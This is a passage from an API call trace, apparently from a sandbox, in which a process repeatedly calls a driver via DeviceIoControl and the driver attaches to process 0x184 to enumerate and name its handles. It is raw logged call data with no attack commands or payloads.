(ApcState=0xfffff880052b35d0) [0221.870] PsReleaseProcessExitSynchronization () returned 0x2 [0221.870] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.871] ObQueryNameString (in: Object=0xfffff8a0011706f0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.871] ObfDereferenceObject (Object=0xfffff8a0011706f0) returned 0x1 [0221.871] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.871] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.871] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.871] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.871] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.871] PsAcquireProcessExitSynchronization () returned 0x0 [0221.871] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.871] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013ccc10, HandleInformation=0x0) returned 0x0 [0221.871] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.871] PsReleaseProcessExitSynchronization () returned 0x2 [0221.871] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.871] ObQueryNameString (in: Object=0xfffff8a0013ccc10, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.871] ObfDereferenceObject (Object=0xfffff8a0013ccc10) returned 0x1 [0221.871] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.871] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.871] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.871] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.871] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.871] PsAcquireProcessExitSynchronization () returned 0x0 [0221.871] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.871] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013bd470, HandleInformation=0x0) returned 0x0 [0221.871] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.872] PsReleaseProcessExitSynchronization () returned 0x2 [0221.872] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.872] ObQueryNameString (in: Object=0xfffff8a0013bd470, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.872] ObfDereferenceObject (Object=0xfffff8a0013bd470) returned 0x1 [0221.872] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.872] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.872] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.872] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.872] PsAcquireProcessExitSynchronization () returned 0x0 [0221.872] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.872] ObReferenceObjectByHandle (in: Handle=0x374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0015643e0, HandleInformation=0x0) returned 0x0 [0221.872] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.872] PsReleaseProcessExitSynchronization () returned 0x2 [0221.872] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.872] ObQueryNameString (in: Object=0xfffff8a0015643e0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.872] ObfDereferenceObject (Object=0xfffff8a0015643e0) returned 0x1 [0221.872] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.872] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.872] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.872] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.872] PsAcquireProcessExitSynchronization () returned 0x0 [0221.872] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.873] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017e3e40, HandleInformation=0x0) returned 0x0 [0221.873] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.873] PsReleaseProcessExitSynchronization () returned 0x2 [0221.873] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.873] ObQueryNameString (in: Object=0xfffff8a0017e3e40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.873] ObfDereferenceObject (Object=0xfffff8a0017e3e40) returned 0x1 [0221.873] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.873] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.873] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.873] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.873] PsAcquireProcessExitSynchronization () returned 0x0 [0221.873] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.873] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017c0900, HandleInformation=0x0) returned 0x0 [0221.873] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.873] PsReleaseProcessExitSynchronization () returned 0x2 [0221.873] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.873] ObQueryNameString (in: Object=0xfffff8a0017c0900, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.873] ObfDereferenceObject (Object=0xfffff8a0017c0900) returned 0x1 [0221.873] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.873] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.873] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.874] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.874] PsAcquireProcessExitSynchronization () returned 0x0 [0221.874] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.874] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170410, HandleInformation=0x0) returned 0x0 [0221.874] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.874] PsReleaseProcessExitSynchronization () returned 0x2 [0221.874] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.874] ObQueryNameString (in: Object=0xfffff8a001170410, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.874] ObfDereferenceObject (Object=0xfffff8a001170410) returned 0x1 [0221.874] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.874] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.874] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.874] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.874] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.874] PsAcquireProcessExitSynchronization () returned 0x0 [0221.874] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.874] ObReferenceObjectByHandle (in: Handle=0x3b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017aa130, HandleInformation=0x0) returned 0x0 [0221.874] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.874] PsReleaseProcessExitSynchronization () returned 0x2 [0221.874] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.874] ObQueryNameString (in: Object=0xfffff8a0017aa130, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.874] ObfDereferenceObject (Object=0xfffff8a0017aa130) returned 0x1 [0221.874] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.875] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.875] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.875] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.875] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.875] PsAcquireProcessExitSynchronization () returned 0x0 [0221.875] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.875] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0014c23e0, HandleInformation=0x0) returned 0x0 [0221.875] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.875] PsReleaseProcessExitSynchronization () returned 0x2 [0221.875] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.875] ObQueryNameString (in: Object=0xfffff8a0014c23e0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.875] ObfDereferenceObject (Object=0xfffff8a0014c23e0) returned 0x1 [0221.875] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.875] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.875] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.875] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.875] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.875] PsAcquireProcessExitSynchronization () returned 0x0 [0221.875] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.875] ObReferenceObjectByHandle (in: Handle=0x3d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017b4430, HandleInformation=0x0) returned 0x0 [0221.875] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.875] PsReleaseProcessExitSynchronization () returned 0x2 [0221.875] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.875] ObQueryNameString (in: Object=0xfffff8a0017b4430, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.876] ObfDereferenceObject (Object=0xfffff8a0017b4430) returned 0x1 [0221.876] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.876] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.876] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.876] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.876] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.876] PsAcquireProcessExitSynchronization () returned 0x0 [0221.876] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.876] ObReferenceObjectByHandle (in: Handle=0x3e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017c7d70, HandleInformation=0x0) returned 0x0 [0221.876] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.876] PsReleaseProcessExitSynchronization () returned 0x2 [0221.876] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.876] ObQueryNameString (in: Object=0xfffff8a0017c7d70, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.876] ObfDereferenceObject (Object=0xfffff8a0017c7d70) returned 0x1 [0221.876] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.876] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.876] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.876] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.876] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.876] PsAcquireProcessExitSynchronization () returned 0x0 [0221.876] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.877] ObReferenceObjectByHandle (in: Handle=0x3f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00122ffc0, HandleInformation=0x0) returned 0x0 [0221.877] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.877] PsReleaseProcessExitSynchronization () returned 0x2 [0221.877] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.877] ObQueryNameString (in: Object=0xfffff8a00122ffc0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.877] ObfDereferenceObject (Object=0xfffff8a00122ffc0) returned 0x1 [0221.877] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.877] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.877] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.877] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.877] PsAcquireProcessExitSynchronization () returned 0x0 [0221.877] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.877] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00180c9f0, HandleInformation=0x0) returned 0x0 [0221.877] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.877] PsReleaseProcessExitSynchronization () returned 0x2 [0221.877] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.877] ObQueryNameString (in: Object=0xfffff8a00180c9f0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.877] ObfDereferenceObject (Object=0xfffff8a00180c9f0) returned 0x1 [0221.877] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.877] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.877] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.877] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.877] PsAcquireProcessExitSynchronization () returned 0x0 [0221.877] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.878] ObReferenceObjectByHandle (in: Handle=0x414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00180a9d0, HandleInformation=0x0) returned 0x0 [0221.878] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.878] PsReleaseProcessExitSynchronization () returned 0x2 [0221.878] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.878] ObQueryNameString (in: Object=0xfffff8a00180a9d0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.878] ObfDereferenceObject (Object=0xfffff8a00180a9d0) returned 0x1 [0221.878] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.878] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.878] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.878] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.878] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.878] PsAcquireProcessExitSynchronization () returned 0x0 [0221.878] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.878] ObReferenceObjectByHandle (in: Handle=0x424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00182a7f0, HandleInformation=0x0) returned 0x0 [0221.878] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.878] PsReleaseProcessExitSynchronization () returned 0x2 [0221.878] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.878] ObQueryNameString (in: Object=0xfffff8a00182a7f0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.878] ObfDereferenceObject (Object=0xfffff8a00182a7f0) returned 0x1 [0221.878] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.879] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.879] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.879] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.879] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.879] PsAcquireProcessExitSynchronization () returned 0x0 [0221.879] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.879] ObReferenceObjectByHandle (in: Handle=0x434, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017c1b00, HandleInformation=0x0) returned 0x0 [0221.879] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.879] PsReleaseProcessExitSynchronization () returned 0x2 [0221.879] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.879] ObQueryNameString (in: Object=0xfffff8a0017c1b00, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.879] 